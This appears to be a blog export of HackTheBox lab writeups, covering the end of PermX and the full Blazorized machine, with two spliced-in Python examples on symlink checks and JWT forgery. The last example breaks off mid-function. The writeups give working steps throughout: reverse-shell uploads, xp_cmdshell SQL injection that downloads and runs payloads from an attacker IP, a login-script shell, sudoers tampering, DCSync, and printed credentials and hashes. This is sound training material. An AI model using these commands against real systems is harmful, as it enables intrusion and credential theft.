redirect to http://permx.htb\nService Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel\nWe see a standard setup for an easy rated machine.\nPort 80 - Subdomain Enumeration and Chamilo Looking at the output from nmap, we can see that the website on port 80 is trying to redirect to http://permx.htb. So that we can visit this, we will add it to our /etc/hosts file:\necho -e \u0026#39;10.129.255.122\\tpermx.htb\u0026#39; | sudo tee -a /etc/hosts\nCarrying out subdomain enumeration against the target, we find a subdomain lms.permx.htb:\nTo visit this subdomain, 
we need to add lms.permx.htb as an entry to /etc/hosts; it will look like this:\n10.129.255.122 permx.htb lms.permx.htb\nNow we can visit this page and we see a login page for an application called Chamilo.\nExploiting Chamilo - CVE-2023-4226 When looking for an exploit for Chamilo, we can find CVE-2023-4226. This is an unauthenticated, unrestricted file upload in versions 1.11.24 and under, which gives remote code execution because the uploaded file is written to a web-accessible directory and served back. I could not find any headers giving an exact version, but there were references to Chamilo 1 in the X-Powered-By header and in some meta tags in the page source.\nLooking at the sources provided on this NVD page, we can see a source for starlabs. Using this blog post, we can follow along and see if this instance of Chamilo is vulnerable.\nFirst we want to check if the following vulnerable directory exists: http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/:\nNow that we know the vulnerable directory exists, we can try placing a reverse shell payload in it. In this case, I used the pentestmonkey PHP reverse shell. We need to modify the $ip and $port parameters to match the tun0 address and the port we are listening on with netcat:\nnc -nvlp 4444\nWe will now want to upload the reverse shell payload into the bigupload directory. We can do this using curl:\ncurl -F \u0026#39;bigUploadFile=@rev-shell.php\u0026#39; \u0026#39;http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported\u0026#39;\nNow when we go back to our browser, we should see that rev-shell.php is there:\nNow we can click this file and we get a reverse shell coming in through our netcat listener. Running whoami, we can see that we have landed as the user www-data.\nReverse Shell Established - Further Enumeration Next we can go and check what users exist on this box by looking in /home.\nSome further enumeration is now required to see if we can get access to another user such as mtz or root. For this enumeration, linpeas was used. 
First we need to find somewhere that www-data can operate out of; looking at the assigned permissions with ls -la, we can see that we have rwx permissions there. Now we will use a Python HTTP server to serve linpeas and curl to download it onto the victim host.\n# Kali\npython -m http.server 80\n\n# Victim\ncurl --output linpeas.sh http://10.10.14.211/linpeas.sh\nWith linpeas on the machine, we need to make it executable and then run it.\nchmod +x linpeas.sh\n./linpeas.sh\nIn the linpeas output, we see that there is a possible password found in a Chamilo configuration file.\nValid Credential for SSH - Collecting User Flag We can try this password for mtz and root to see if either lets us SSH in. We see success with the mtz user.\nNow we can collect the user flag.\nPrivilege Escalation Now that we have access to a user, we will want to escalate our privileges to root. We will start by looking at the sudo permissions of this user using sudo -l.\nWe see that mtz can run the script acl.sh with sudo. We should investigate this script to see what it is doing.\nChecking acl.sh The following contents were found in the script:\n#!/bin/bash\n\nif [ \u0026#34;$#\u0026#34; -ne 3 ]; then\n    /usr/bin/echo \u0026#34;Usage: $0 user perm file\u0026#34;\n    exit 1\nfi\n\nuser=\u0026#34;$1\u0026#34;\nperm=\u0026#34;$2\u0026#34;\ntarget=\u0026#34;$3\u0026#34;\n\nif [[ \u0026#34;$target\u0026#34; != /home/mtz/* || \u0026#34;$target\u0026#34; == *..* ]]; then\n    /usr/bin/echo \u0026#34;Access denied.\u0026#34;\n    exit 1\nfi\n\n# Check if the path is a file\nif [ ! -f \u0026#34;$target\u0026#34; ]; then\n    /usr/bin/echo \u0026#34;Target must be a file.\u0026#34;\n    exit 1\nfi\n\n/usr/bin/sudo /usr/bin/setfacl -m u:\u0026#34;$user\u0026#34;:\u0026#34;$perm\u0026#34; \u0026#34;$target\u0026#34;\nLooking at the content of this script, we can see that it is using the tool setfacl. 
Having a look at the documentation, we can see that the -m flag is used to modify the ACL of a file. Going to the Arch wiki article for ACLs, we see these grant permissions to specific users or groups on filesystem objects, independently of the usual owner/group/other mode bits.\nLooking at the first if, we can see that it will not execute if the target path does not start with /home/mtz/ or if it contains .., so we cannot use .. to navigate back up the file system.\nif [[ \u0026#34;$target\u0026#34; != /home/mtz/* || \u0026#34;$target\u0026#34; == *..* ]];\nIn the second if, we can see that we must be targeting a regular file due to the -f test.\nif [ ! -f \u0026#34;$target\u0026#34; ];\nThe important detail is that both the -f test and setfacl follow symbolic links: -f is true for a symlink whose target is a regular file, and setfacl applies the change to the link target by default. Neither check canonicalises the path before using it.\nWith all of this in mind, we now know that we need something in the home directory of our current user that passes these checks but points at the file we actually want setfacl to run on. This is where symbolic links become useful. If you are not familiar with symlinks, I would recommend having a look at this video from Read Write Exercise and this man page.\nUsing Symbolic Link to Escalate Privilege Now that we know we want to drop a symlink into the home folder of mtz, we need to think of a file that we can link to that will allow us to elevate our privileges. In this case, I will target the /etc/sudoers file to expand the sudo permissions of the user. 
To do this we can run the following command:\nln -s /etc/sudoers /home/mtz/sudoers_link\nNow we can run the script to modify the ACL and give ourselves access to /etc/sudoers:\nsudo /opt/acl.sh mtz rw /home/mtz/sudoers_link\nWhen running ls -la /etc/sudoers we will now see a + symbol next to the permissions, which tells us that an ACL is in use, and running getfacl on /home/mtz/sudoers_link or /etc/sudoers, we will see that the owner is root and mtz has rw permissions.\nNow we can open /etc/sudoers through the symbolic link and modify it.\nvim /home/mtz/sudoers_link\nWe will want to add the following into the sudoers file to give mtz more privileges. Be careful with the syntax here: a malformed /etc/sudoers breaks sudo for every user on the host.\nWith this in place, we can now escalate our privilege to the root user using sudo su:\n"
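The acl.sh bypass comes down to one property: the prefix test, the .. test and the -f test all look at the path string or follow the link, so a symlink inside /home/mtz that points at /etc/sudoers passes every check. The following is an added example written for this page, not code from the writeup or from the box: it re-implements the script's three checks in Python (os.path.isfile follows symlinks exactly as bash's -f does), runs them against a constructed /home/mtz-style tree with a symlink to a fake sudoers file, and puts a hardened version beside them. The temporary directory, the fake sudoers content and the notes.txt file are all constructed for the demonstration.

```python
"""Added example (not from the PermX writeup): the three checks in /opt/acl.sh,
re-implemented in Python so the symlink bypass and a hardened version can be
run side by side on constructed files. The `root` argument stands in for the
hard-coded /home/mtz; the tree built in demo() is constructed here."""
import os
import tempfile


def vulnerable_check(root: str, target: str) -> bool:
    """Mirror of acl.sh: prefix test, '..' test, then a regular-file test.
    os.path.isfile, like bash's -f, follows symlinks, so a link inside
    `root` that points at a file outside it passes every check."""
    if not target.startswith(root + "/") or ".." in target:
        return False                     # "Access denied."
    if not os.path.isfile(target):
        return False                     # "Target must be a file."
    return True                          # setfacl would now run on the target


def hardened_check(root: str, target: str) -> bool:
    """Reject symlinks outright and compare canonical paths, so neither a
    symlinked file nor a symlinked directory component can escape `root`."""
    if os.path.islink(target):
        return False
    real_root = os.path.realpath(root)
    real_target = os.path.realpath(target)
    if os.path.commonpath([real_root, real_target]) != real_root:
        return False
    return real_target != real_root and os.path.isfile(real_target)


def demo() -> dict:
    """Build /home/mtz-like and /etc-like trees under a temp dir (constructed)
    and evaluate both checks against a symlink to the fake sudoers file."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "home", "mtz")
        etc = os.path.join(tmp, "etc")
        os.makedirs(home)
        os.makedirs(etc)
        sudoers = os.path.join(etc, "sudoers")          # stand-in for /etc/sudoers
        with open(sudoers, "w") as f:
            f.write("root ALL=(ALL:ALL) ALL\n")
        link = os.path.join(home, "sudoers_link")
        os.symlink(sudoers, link)
        real_file = os.path.join(home, "notes.txt")      # a legitimate target
        with open(real_file, "w") as f:
            f.write("harmless\n")
        return {
            "symlink_vulnerable": vulnerable_check(home, link),
            "symlink_hardened": hardened_check(home, link),
            "plain_file_vulnerable": vulnerable_check(home, real_file),
            "plain_file_hardened": hardened_check(home, real_file),
            "traversal_vulnerable": vulnerable_check(home, home + "/../../etc/sudoers"),
        }


if __name__ == "__main__":
    for name, allowed in demo().items():
        print(f"{name}: {'allowed' if allowed else 'denied'}")
```

Rejecting the link with an lstat-style test is necessary but not sufficient on its own: a symlinked directory component (for example /home/mtz/dir -> /etc) would still pass, which is why the hardened version also canonicalises both sides and checks the prefix on the resolved path. Even then a race remains between the check and the setfacl call, so a script like this should not be exposed through sudo at all.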
  },
  {
    "title":     "HackTheBox - Blazorized Writeup",
    "permalink": "/posts/blazorized/",
    "date":      "jan 07 2024",
    "summary":   "A forged JWT from a decompiled .NET WASM DLL exposes a SQL injection foothold, before chaining WriteSPN Kerberoasting, a malicious login script, and DCSync via Mimikatz to reach Domain Admin.",
    "tags":      ["HackTheBox"],
    "type":      "posts",
    "content":   "Blazorized was a medium rated Windows machine from week 11 of HackTheBox season 5 \u0026ldquo;Anomalies\u0026rdquo;. This rating was later changed to hard when it was retired. In this walkthrough, I will demonstrate how I was able to obtain Domain Admin access to this machine. This box proved to be quite difficult for me and required very good enumeration.\nBlazorized is a machine running Windows and is functioning as a domain controller. On this machine, we find a Blazor .NET WASM application. We are able to obtain a DLL, use AvaloniaILSpy to read its contents, and write a Python script to create a \u0026ldquo;superadmin\u0026rdquo; JWT and access the admin area of the website. From here we will see that we can abuse a SQL injection vulnerability to gain a reverse shell. We then abuse a WriteSPN privilege to pivot to another user using a targeted Kerberoast attack. We will then pivot into another user account by abusing permissions to write a login script that triggers a reverse shell. Finally, we will abuse a DCSync privilege using mimikatz to dump the administrator\u0026rsquo;s NTLM hash and get a shell as the administrator.\nScanning and Enumeration First, rustscan is run to quickly get a list of open ports. 
The -g flag is used in this case so that the output is provided as a list that can be easily passed to nmap.\nrustscan -g -a 10.129.27.141 --ulimit 5000\n[53,80,88,135,139,389,445,464,593,1433,3268,5985,9389,47001,49667,49666,49669,49665,49664,49671,49670,49674,49700,49707,49776,58643]\nWe can then take these ports and pass them to an nmap scan.\nnmap -p 53,80,88,135,139,389,445,464,593,1433,3268,5985,9389,47001,49667,49666,49669,49665,49664,49671,49670,49674,49700,49707,49776,58643 -sC -sV -oA Nmap/rustports 10.129.27.141\nPORT      STATE SERVICE       VERSION\n53/tcp    open  domain        Simple DNS Plus\n80/tcp    open  http          Microsoft IIS httpd 10.0\n|_http-server-header: Microsoft-IIS/10.0\n|_http-title: Did not follow redirect to http://blazorized.htb\n88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-02 19:47:38Z)\n135/tcp   open  msrpc         Microsoft Windows RPC\n139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn\n389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)\n445/tcp   open  microsoft-ds?\n464/tcp   open  kpasswd5?\n593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2024-07-02T19:40:57\n|_Not valid after:  2054-07-02T19:40:57\n| ms-sql-ntlm-info:\n|   10.129.27.141\\BLAZORIZED:\n|     Target_Name: BLAZORIZED\n|     NetBIOS_Domain_Name: BLAZORIZED\n|     NetBIOS_Computer_Name: DC1\n|     DNS_Domain_Name: blazorized.htb\n|     DNS_Computer_Name: DC1.blazorized.htb\n|     DNS_Tree_Name: blazorized.htb\n|_    Product_Version: 10.0.17763\n| ms-sql-info:\n|   10.129.27.141\\BLAZORIZED:\n|     Instance name: BLAZORIZED\n|     Version:\n|       name: Microsoft SQL Server 2022 RC0+\n|       number: 16.00.1115.00\n|       Product: Microsoft SQL Server 2022\n|       Service pack level: RC0\n|       Post-SP patches applied: true\n|     TCP port: 1433\n|_    Clustered: false\n|_ssl-date: 2024-07-02T19:48:42+00:00; +1s from scanner time.\n3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)\n5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)\n|_http-title: Not Found\n|_http-server-header: Microsoft-HTTPAPI/2.0\n9389/tcp  open  mc-nmf        .NET Message Framing\n47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)\n|_http-server-header: Microsoft-HTTPAPI/2.0\n|_http-title: Not Found\n49664/tcp open  msrpc         Microsoft Windows RPC\n49665/tcp open  msrpc         Microsoft Windows RPC\n49666/tcp open  msrpc         Microsoft Windows RPC\n49667/tcp open  msrpc         Microsoft Windows RPC\n49669/tcp open  msrpc         Microsoft Windows RPC\n49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0\n49671/tcp open  msrpc         Microsoft Windows RPC\n49674/tcp open  msrpc         Microsoft Windows RPC\n49700/tcp open  msrpc         Microsoft Windows RPC\n49707/tcp open  msrpc         Microsoft Windows RPC\n49776/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2024-07-02T19:40:57\n|_Not valid after:  2054-07-02T19:40:57\n|_ssl-date: 2024-07-02T19:48:42+00:00; +1s from scanner time.\n| ms-sql-info:\n|   10.129.27.141:49776:\n|     Version:\n|       name: Microsoft SQL Server 2022 RC0+\n|       number: 16.00.1115.00\n|       Product: Microsoft SQL Server 2022\n|       Service pack level: RC0\n|       Post-SP patches applied: true\n|_    TCP port: 49776\n| ms-sql-ntlm-info:\n|   10.129.27.141:49776:\n|     Target_Name: BLAZORIZED\n|     NetBIOS_Domain_Name: BLAZORIZED\n|     NetBIOS_Computer_Name: DC1\n|     DNS_Domain_Name: blazorized.htb\n|     DNS_Computer_Name: DC1.blazorized.htb\n|     DNS_Tree_Name: blazorized.htb\n|_    Product_Version: 10.0.17763\n58643/tcp open  msrpc         Microsoft Windows RPC\nService Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode:\n|   3:1:1:\n|_    Message signing enabled and required\n| smb2-time:\n|   date: 2024-07-02T19:48:34\n|_  start_date: N/A\nFrom this output we can determine that this is a domain controller due to the presence of services like Kerberos running on port 88 and LDAP on port 389. SMB signing being required also rules out relaying captured NTLM authentication to this host\u0026rsquo;s SMB service.\nPort 80 - blazorized.htb We see that this web server is running IIS 10 and redirects to blazorized.htb. We will need to add a DNS entry for this to resolve. The following command will write an entry in /etc/hosts for us:\necho -e \u0026#39;10.129.27.141\\tblazorized.htb\u0026#39; | sudo tee -a /etc/hosts\nWe see that this site belongs to Mozhar Alhosni, which could help us with a username. We see that this site is built using a framework called Blazor when looking at the footer:\nBuilt with ❤️ using Blazor WebAssembly\nBlazor WASM Application I came across this video showing how to get DLLs using Postman and decompiling them to get secrets: https://www.youtube.com/watch?v=Xx1eMlscXrQ\nNow that we know that we can obtain DLL files from the site, I wanted to see if there was a way that I could get a collection of every DLL that was being used. 
Looking on StackOverflow, we can get a list of DLLs in use by looking at blazor.boot.json.\nWe can copy the URL out from here and this takes us to the following page: http://blazorized.htb/_framework/blazor.boot.json\nWe can see the DLLs are all being loaded in the same way with the exception of the one under lazyAssembly: there is a file called Blazorized.Helpers.dll. We can get a copy of this by going to http://blazorized.htb/_framework/blazorized.Helpers.dll.\nDoing some research on lazyAssembly, we find that it is used for loading developer-created assemblies only when they are required. We can see this in action: visiting the site without any cache only loads this DLL when we visit the \u0026ldquo;Check for Updates\u0026rdquo; page. Further reading on lazyAssembly\nDLL Analysis - Finding the Authentication Mechanism To decompile the DLL I used AvaloniaILSpy. We can import it using File \u0026gt; Open and then navigating to where the DLL is stored. You will now see Blazorized.Helpers in the menu on the left. Expanding this, we can see a class called JWT that has some functions we should look at.\nInside the DLL, we find some useful variables that include a symmetric signing key, interesting subdomains, and the admin username. Anything shipped to the browser in a WASM assembly is readable by every client, so a symmetric JWT key here lets anyone mint tokens the server will accept. 
We can also see a function GenerateSuperAdminJWT. The following is that function with the relevant variables:\n{\n\tprivate const long EXPIRATION_DURATION_IN_SECONDS = 60L;\n\tprivate static readonly string jwtSymmetricSecurityKey = \u0026#34;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\u0026#34;;\n\tprivate static readonly string superAdminEmailClaimValue = \u0026#34;superadmin@blazorized.htb\u0026#34;;\n\tprivate static readonly string postsPermissionsClaimValue = \u0026#34;Posts_Get_All\u0026#34;;\n\tprivate static readonly string categoriesPermissionsClaimValue = \u0026#34;Categories_Get_All\u0026#34;;\n\tprivate static readonly string superAdminRoleClaimValue = \u0026#34;Super_Admin\u0026#34;;\n\tprivate static readonly string issuer = \u0026#34;http://api.blazorized.htb\u0026#34;;\n\tprivate static readonly string apiAudience = \u0026#34;http://api.blazorized.htb\u0026#34;;\n\tprivate static readonly string adminDashboardAudience = \u0026#34;http://admin.blazorized.htb\u0026#34;;\n\n\n\tprivate static SigningCredentials GetSigningCredentials()\n\t{\n\ttry\n\t{\n\treturn new SigningCredentials((SecurityKey)new SymmetricSecurityKey(Encoding.get_UTF8().GetBytes(jwtSymmetricSecurityKey)), \u0026#34;HS512\u0026#34;);\n\t}\n\tcatch (System.Exception)\n\t{\n\tthrow;\n\t}\n\t}\n\n\n\tpublic static string GenerateSuperAdminJWT(long expirationDurationInSeconds = 60L)\n\t{\n\ttry\n\t{\n\tList\u0026lt;Claim\u0026gt; obj = new List\u0026lt;Claim\u0026gt;();\n\tobj.Add(new Claim(\u0026#34;http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress\u0026#34;, superAdminEmailClaimValue));\n\tobj.Add(new Claim(\u0026#34;http://schemas.microsoft.com/ws/2008/06/identity/claims/role\u0026#34;, superAdminRoleClaimValue));\n\tList\u0026lt;Claim\u0026gt; val = obj;\n\tstring text = issuer;\n\tstring text2 = adminDashboardAudience;\n\tSigningCredentials signingCredentials = GetSigningCredentials();\n\tSystem.DateTime? dateTime = System.DateTime.get_UtcNow().AddSeconds((double)expirationDurationInSeconds);\n\tJwtSecurityToken val2 = new JwtSecurityToken(text, text2, (System.Collections.Generic.IEnumerable\u0026lt;Claim\u0026gt;)val, (System.DateTime?)null, dateTime, signingCredentials);\n\treturn ((SecurityTokenHandler)new JwtSecurityTokenHandler()).WriteToken((SecurityToken)(object)val2);\n\t}\n\tcatch (System.Exception)\n\t{\n\tthrow;\n\t}\n\t}\n}\nNow that we know about the subdomains api and admin, we should add them to our /etc/hosts file:\n10.129.231.74 blazorized.htb admin.blazorized.htb api.blazorized.htb\nA legitimate JWT is generated when the API is called from the following page:\nhttp://blazorized.htb/check-updates\nAfter clicking it we can see the following header in our Burp HTTP history:\nWe can then inspect the JWT with jwt.io to see that what is being generated is valid:\nGenerating a Superadmin JWT Now we can use a script to generate a valid JWT (this uses the PyJWT package):\nimport jwt\nimport datetime\n\ntoken_expiry = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(seconds=600)\n\n# GenerateSuperAdminJWT\npayload = {\n    \u0026#34;http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress\u0026#34;: \u0026#34;superadmin@blazorized.htb\u0026#34;,\n    \u0026#34;http://schemas.microsoft.com/ws/2008/06/identity/claims/role\u0026#34;: \u0026#34;Super_Admin\u0026#34;,\n    \u0026#34;exp\u0026#34;: token_expiry,\n    \u0026#34;iss\u0026#34;: \u0026#34;http://api.blazorized.htb\u0026#34;,\n    \u0026#34;aud\u0026#34;: \u0026#34;http://admin.blazorized.htb\u0026#34;\n}\n\n# jwtSymmetricSecurityKey\njwt_symmetric_security_key = \u0026#34;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\u0026#34;\n\n# Encode the JWT token - HS512 algorithm taken from GetSigningCredentials\njwt_token = jwt.encode(payload, jwt_symmetric_security_key, algorithm=\u0026#39;HS512\u0026#39;)\n\n# JavaScript snippet to set JWT token in local storage\njs_code = f\u0026#34;\u0026#34;\u0026#34;\nlocalStorage.setItem(\u0026#39;jwt\u0026#39;, \u0026#39;{jwt_token}\u0026#39;);\nconsole.log(\u0026#39;JWT token set in local storage\u0026#39;);\n\u0026#34;\u0026#34;\u0026#34;\nprint(\u0026#39;The current JWT will expire at: \u0026#39; + str(token_expiry))\nprint(\u0026#39;JavaScript to set JWT in local storage:\u0026#39;)\nprint(js_code)\nWe can then take the printed JavaScript snippet, visit admin.blazorized.htb and paste it into the browser console. After running it we will see the following output:\nUpon reloading the page, we will see that we bypass the login mechanism and land in the super admin panel.\nSQL Injection For Reverse shell and User Flag The message mentions being connected directly to the database. This is probably going to lead us into performing a SQLi attack.\nWe can find the injection point by going to the Check Duplicate Category Names section and entering the following payload:\nabc\u0026#39; OR 1=1--\nWe see the following response:\nWe can confirm that xp_cmdshell is enabled on the box with a ping payload, using tcpdump to watch tun0 for ICMP traffic:\naaa\u0026#39; EXEC master.dbo.xp_cmdshell \u0026#39;ping 10.10.16.37\u0026#39;; --\n# Kali\nsudo tcpdump -i tun0 icmp\nWe will now drop a reverse shell payload. 
First we generate the reverse shell:\nmsfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.37 LPORT=443 -f exe \u0026gt; rev.exe\nNow we will serve it with a Python HTTP server and start a listener on our Kali host:\npython3 -m http.server 80\n\nnc -nvlp 443\nWe will now use certutil to download the payload to the victim machine and then execute it:\naaa\u0026#39; EXEC master.dbo.xp_cmdshell \u0026#39;certutil.exe -urlcache -f http://10.10.16.37/rev.exe C:\\temp\\rev.exe\u0026#39;; --\n\naaa\u0026#39; EXEC master.dbo.xp_cmdshell \u0026#39;C:\\temp\\rev.exe\u0026#39;; --\nWe see that we get a shell back as the user nu_1055:\nWe can now get the user flag:\nPrivilege Escalation WinPeas Enumeration We will start our privilege escalation by transferring winpeas onto the machine using certutil and a Python HTTP server, the same method we just used.\n# KALI\ncp /usr/share/peass/winpeas/winPEASx64.exe .\npython3 -m http.server 80\n\n# VICTIM\ncd C:\\temp\ncertutil.exe -urlcache -f http://10.10.16.37/winPEASx64.exe C:\\temp\\winpeas.exe\nwinpeas.exe\nAfter running winpeas, we can get a list of usernames that have logged into this machine before:\n╔══════════╣ Ever logged users\n NT SERVICE\\SQLTELEMETRY$BLAZORIZED\n NT SERVICE\\MSSQL$BLAZORIZED\n BLAZORIZED\\Administrator\n BLAZORIZED\\SSA_6010\n BLAZORIZED\\NU_1055\n BLAZORIZED\\RSA_4810\nWhen looking further into the output, we can see that there is a NetNTLMv2 hash found while enumerating security package credentials:\nNU_1055::BLAZORIZED:1122334455667788:4b3d889dc2b1aeea147094943ce401f5:010100000000000029503f2f39cfda017282ca42dbb55c0b000000000800300030000000000000000000000000210000fca9a2d27cf2d10aa923114391bf577fec2a9f44a5d47d41586175f0f9e314770a00100000000000000000000000000000000000090000000000000000000000\nWe can\u0026rsquo;t pass the hash with a NetNTLMv2 response (only NT hashes can be passed), and attempting to crack it with hashcat fails.\nSharpHound - Extracting Domain Info There wasn\u0026rsquo;t much more that I 
picked out as being interesting from the winpeas output, so we can move on to BloodHound. Download SharpHound.ps1 to the victim machine; I used a Python HTTP server and certutil as shown before. I then ran the following commands:\npowershell -ep bypass\n. .\\SharpHound.ps1\nInvoke-BloodHound -CollectionMethod All -OutputDirectory C:\\Users\\NU_1055 -OutputPrefix blazorized\nWith the zip generated, we can convert it to base64 to extract it:\ncertutil -encode bloodhound.zip bloodhound.b64\nUse something like more to read it, and remember to TRIM THE HEADERS that certutil inserts, keeping only the base64 string, which should then be placed in a file on your Kali machine.\nmore bloodhound.b64\nWe will then need to start the neo4j database and BloodHound to ingest the results and look at them.\nsudo neo4j \u0026amp;\nsudo bloodhound \u0026amp;\nWe can then convert this back to a zip file on Kali and import it into BloodHound:\nbase64 -d bloodhound.b64 \u0026gt; bloodhound.zip\nBloodhound Enumeration We can find a list of all users to have a look at them:\nMATCH(m:User) RETURN m\nLooking at NU_1055, we see WriteSPN access over user RSA_4810 when looking under outbound object control and looking at the first degree object control.\nExploiting WriteSPN for Targeted Kerberoast I couldn\u0026rsquo;t get the WriteSPN abuse to work with the instructions given in BloodHound, so I instead used the following for a targeted Kerberoast. Note that you will need to use PowerView, so import it the same way we did for SharpHound:\nWe can now take this hash and place it in a text file for cracking. 
We can run hashcat and it will autodetect mode 13100 (Kerberos 5 TGS-REP, etype 23):\nhashcat spn.hash /usr/share/wordlists/rockyou.txt --force\nWe will see that the hash is cracked:\nGetting a Session as RSA_4810 - Evil-WinRM We can now connect to the box using evil-winrm:\nevil-winrm -i blazorized.htb -u rsa_4810 -p \u0026#39;(Ni7856Do9854Ki05Ng0005 #)\u0026#39;\nLooking at RSA_4810\u0026rsquo;s group memberships, we can see an interesting group called Remote_Support_Administrators.\nChecking RSA_4810 Write Access We can transfer and run accesschk from the SysInternals tools to see where our current user has write access:\ncertutil.exe -urlcache -f http://10.10.14.105/accesschk64.exe C:\\Users\\RSA_4810\\Documents\\accesschk.exe\n\n.\\accesschk.exe /accepteula -uwds blazorized\\rsa_4810 C:\\Windows\nThe output shows that the user RSA_4810 has read and write access over directories in C:\\Windows\\SYSVOL\\domain\\scripts. This is the NETLOGON share, so anything placed here can be referenced as a user logon script:\nicacls \\Windows\\SYSVOL\\domain\\scripts\\A32FF3AEAA23\nPivot to SSA_6010 Using ScriptPath Looking at BloodHound we can see that the user SSA_6010 has a session running on DC1:\nRunning winpeas and checking the Display information about local users section, we can see that SSA_6010 has a very high logon count. This could point to automated logins occurring.\nIf we look at the default value of the script path for SSA_6010, we will see that it is blank. 
We can change this to point to a reverse shell payload we drop in. The ScriptPath value is relative to the NETLOGON share:\nSet-ADUser -Identity ssa_6010 -ScriptPath \u0026#39;A32FF3AEAA23\\login.bat\u0026#39;\n\nGet-ADUser -Identity ssa_6010 -Properties ScriptPath | Select-Object Name, ScriptPath\nWe now use mkpsrevshell.py to generate a reverse shell payload, which we then add to the batch file we create in C:\\Windows\\SYSVOL\\domain\\scripts\\A32FF3AEAA23\npython3 mkpsrevshell.py 10.10.16.37 443\nThe output:\npowershell -e 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\nNow we can add this payload and wait for a reverse shell (C:\\Windows\\SYSVOL\\domain is a junction to C:\\Windows\\SYSVOL\\sysvol\\blazorized.htb, so this is the same scripts directory):\necho \u0026#34;powershell -e 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\u0026#34; | out-file C:\\windows\\SYSVOL\\sysvol\\blazorized.htb\\scripts\\A32FF3AEAA23\\login.bat -Encoding ASCII\nStart a netcat listener and wait for the next automated logon of SSA_6010 to trigger it:\nnc -nvlp 443\nDCSync to Administrator Looking at BloodHound we can see that the user SSA_6010 has DCSync rights over the domain. This will allow us to use mimikatz to perform a DCSync attack. The shell from the PowerShell payload kept crashing, so I moved another reverse shell generated with msfvenom onto the box to get a more stable shell back to my Kali machine. After this I uploaded mimikatz and used lsadump::dcsync /domain:blazorized.htb /all. This gave the Administrator hash:\n.\\mimikatz.exe\nlsadump::dcsync /domain:blazorized.htb /all\nSAM Username         : Administrator\nUser Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )\nObject Security ID   : S-1-5-21-2039403211-964143010-2924010611-500\nObject Relative ID   : 500\n\nCredentials:\n  Hash NTLM: f55ed1465179ba374ec1cad05b34a5f3\nWith this hash, I connected to the box with evil-winrm using pass-the-hash and collected the root flag:\nevil-winrm -i blazorized.htb -u administrator -H \u0026#39;f55ed1465179ba374ec1cad05b34a5f3\u0026#39; "
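The JWT forgery earlier in this writeup works because GenerateSuperAdminJWT, its HS512 symmetric key, issuer and audiences all ship inside a client-downloadable WASM assembly. The following is an added example written for this page, not code from the writeup or from the Blazorized.Helpers DLL: a standard-library re-implementation of what that function produces, placed next to the validation a resource server must perform, so the token structure and the audience/issuer/expiry checks can be seen without PyJWT. SYMMETRIC_KEY is a made-up stand-in for the real jwtSymmetricSecurityKey, which is not reproduced; the claim names, issuer and audiences are the ones recovered from the DLL.

```python
"""Added example, not taken from the Blazorized writeup or from the
Blazorized.Helpers DLL: a standard-library re-implementation of what
GenerateSuperAdminJWT produces (HS512 over the claims recovered from the DLL),
plus the verification a resource server has to perform. SYMMETRIC_KEY is a
made-up stand-in for the real jwtSymmetricSecurityKey, which is not reproduced."""
import base64
import hashlib
import hmac
import json
from typing import Optional

SYMMETRIC_KEY = "stand-in-for-jwtSymmetricSecurityKey"     # assumed, not the real key
ISSUER = "http://api.blazorized.htb"
API_AUDIENCE = "http://api.blazorized.htb"
ADMIN_AUDIENCE = "http://admin.blazorized.htb"
EMAIL_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress"
ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _hs512(signing_input: bytes, key: str) -> bytes:
    # HS512 is HMAC-SHA512 over "<b64url(header)>.<b64url(payload)>"
    return hmac.new(key.encode(), signing_input, hashlib.sha512).digest()


def forge_super_admin_jwt(key: str, now: int, lifetime: int = 60) -> str:
    """Mint the same token GenerateSuperAdminJWT would. Because the key is
    symmetric and shipped in the client DLL, any client can do this."""
    def _compact(obj: dict) -> bytes:
        return json.dumps(obj, separators=(",", ":")).encode()

    header = {"alg": "HS512", "typ": "JWT"}
    payload = {
        EMAIL_CLAIM: "superadmin@blazorized.htb",
        ROLE_CLAIM: "Super_Admin",
        "exp": now + lifetime,
        "iss": ISSUER,
        "aud": ADMIN_AUDIENCE,
    }
    signing_input = f"{_b64url(_compact(header))}.{_b64url(_compact(payload))}".encode()
    return signing_input.decode() + "." + _b64url(_hs512(signing_input, key))


def verify_jwt(token: str, key: str, audience: str, now: int) -> Optional[dict]:
    """Server-side validation: pinned algorithm, constant-time MAC comparison,
    then exp, iss and aud. Returns the claims, or None if anything fails."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
        payload = json.loads(_b64url_decode(p))
        signature = _b64url_decode(s)
    except (ValueError, json.JSONDecodeError):
        return None
    if header.get("alg") != "HS512":            # never let the token choose the algorithm
        return None
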